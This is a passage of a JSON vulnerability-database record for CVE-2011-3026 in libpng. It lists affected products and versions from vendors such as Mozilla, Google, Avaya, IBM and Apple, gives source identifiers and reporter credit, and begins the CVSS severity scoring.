"trust": 0.3,
"vendor": "srware",
"version": "13.0"
},
{
"model": "seamonkey beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.01"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.112"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.05"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "7.0"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6"
},
{
"model": "linux enterprise server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.7"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.100"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.5"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.45"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6.0.1"
},
{
"model": "productions pale moon",
"scope": "eq",
"trust": 0.3,
"vendor": "moonchild",
"version": "3.6.26"
},
{
"model": "firefox beta11",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.10"
},
{
"model": "productions pale moon",
"scope": "eq",
"trust": 0.3,
"vendor": "moonchild",
"version": "3.6.27"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5"
},
{
"model": "firefox esr",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0.2"
},
{
"model": "storwize unified",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.40"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.3"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.62"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.10"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "9.0"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.6"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2011"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16"
},
{
"model": "linux lts lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.1"
},
{
"model": "aura presence services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.12"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.34"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.16"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.551.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.10"
},
{
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.8"
},
{
"model": "enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.23"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.13"
},
{
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.3"
},
{
"model": "aura system manager",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "6.3.2"
},
{
"model": "aura system manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "seamonkey alpha1",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.2"
},
{
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12"
},
{
"model": "beta",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.101"
},
{
"model": "aura system manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "seamonkey alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.03"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.17"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.15"
},
{
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "communication server 1000m signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.0"
},
{
"model": "aura experience portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.212"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.1"
},
{
"model": "messaging storage server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.12"
},
{
"model": "communication server 1000e",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874102"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.14"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.206"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.8"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "7.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.37"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.133"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2.2"
},
{
"model": "aura session manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "15.0.900.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.22"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "5.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6.0.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.46"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.5"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.5"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.10"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.3"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.12"
},
{
"model": "seamonkey alpha3",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.1"
},
{
"model": "aura session manager",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "6.3"
},
{
"model": "conferencing standard edition sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.220"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.101"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.10"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1.2"
},
{
"model": "aura session manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.14"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.12"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.18"
},
{
"model": "firefox beta9",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.13"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "9.0"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "5.0.1"
},
{
"model": "aura presence services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.1"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "ip office application server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "8.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.19"
},
{
"model": "linux enterprise server sp1 for sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.20"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.43"
},
{
"model": "firefox beta5",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.16"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.6"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.300"
},
{
"model": "enterprise linux server optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.2"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1.2"
},
{
"model": "aura application server sip core pb26",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.10"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1.3"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.221"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "7"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.102"
},
{
"model": "aura session manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2"
},
{
"model": "linux lts amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.307"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.8"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.12"
},
{
"model": "linux lts powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.5"
},
{
"model": "seamonkey rc1",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"model": "linux enterprise sdk sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.205"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.16"
},
{
"model": "aura application server sip core pb25",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "5"
},
{
"model": "seamonkey",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.7.2"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.43"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.204"
},
{
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1.1"
},
{
"model": "aura experience portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "5.0"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.3"
},
{
"model": "informix genero",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.40"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.21"
},
{
"model": "communication server 1000e signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "firefox beta3",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "aura system manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.21"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "aura system platform sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "linux enterprise desktop sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.103"
},
{
"model": "firefox beta7",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.224"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.18"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.71"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.8"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.3.0.5"
},
{
"model": "seamonkey alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.02"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.8"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.01"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.020"
},
{
"model": "enterprise linux desktop optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.91"
},
{
"model": "aura communication manager utility services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.308"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.84"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.210"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.550.0"
},
{
"model": "rc1",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.22"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "enterprise linux hpc node",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.14"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.6"
},
{
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.4"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.309"
},
{
"model": "firefox beta12",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.214"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.4"
},
{
"model": "communication server 1000e signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.5"
},
{
"model": "aura communication manager utility services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.0.9.8"
},
{
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.7"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0.1"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "10"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7"
},
{
"model": "aura application server sip core pb16",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.8"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "11"
},
{
"model": "seamonkey alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.01"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.04"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.201"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.11"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.13"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.672.2"
},
{
"model": "ios",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "6"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.163"
},
{
"model": "mac os",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x10.8.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10"
},
{
"model": "communication server 1000m",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.5"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.304"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11"
},
{
"model": "communication server 1000e signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.11"
},
{
"model": "aura communication manager utility services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.305"
},
{
"model": "enterprise linux desktop workstation client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.20"
},
{
"model": "linux enterprise desktop sp1 for sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.237"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.21"
},
{
"model": "linux enterprise desktop sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "15"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "aura conferencing standard",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "lotus notes fp2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.2"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.35"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.16"
},
{
"model": "communication server 1000m signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.5"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.205"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "11.0.700.3"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.2"
},
{
"model": "message networking",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.5"
},
{
"model": "aura application server sip core",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.4"
},
{
"model": "communication server 1000e",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.5"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.19"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.7"
},
{
"model": "productions pale moon",
"scope": "eq",
"trust": 0.3,
"vendor": "moonchild",
"version": "9.1"
},
{
"model": "messaging storage server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.2"
},
{
"model": "communication server 1000m",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.0"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.19"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#849841"
},
{
"db": "BID",
"id": "52049"
},
{
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jueri Aedla",
"sources": [
{
"db": "BID",
"id": "52049"
}
],
"trust": 0.3
},
"cve": "CVE-2011-3026",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2011-3026",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 10.0,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "COMPLETE",
